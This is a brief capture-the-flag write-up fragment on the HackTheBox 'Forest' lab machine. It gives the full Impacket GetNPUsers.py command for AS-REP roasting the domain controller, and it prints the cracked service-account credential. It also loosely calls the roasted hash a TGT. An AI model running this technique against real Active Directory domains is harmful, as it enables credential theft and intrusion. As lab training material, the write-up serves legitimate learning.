Kerberos
Kerbrute Enumeration
AESEProast
With the valid users that we got based on the RPC ENumeration we can potentially get TGTs for these users and crack them.
python3 GetNPUsers.py htb.local/ -dc-ip 10.10.10.161 -no-pass -request -usersfile /home/kali/Forest/results/10.10.10.161/userlist.txt
I ran the following command to try to get a TGT.
The user svc-alfresco had a TGT.
Cracking the TGT allowed me to get the following credentials.
svc-alfresco:s3rvice
Last updated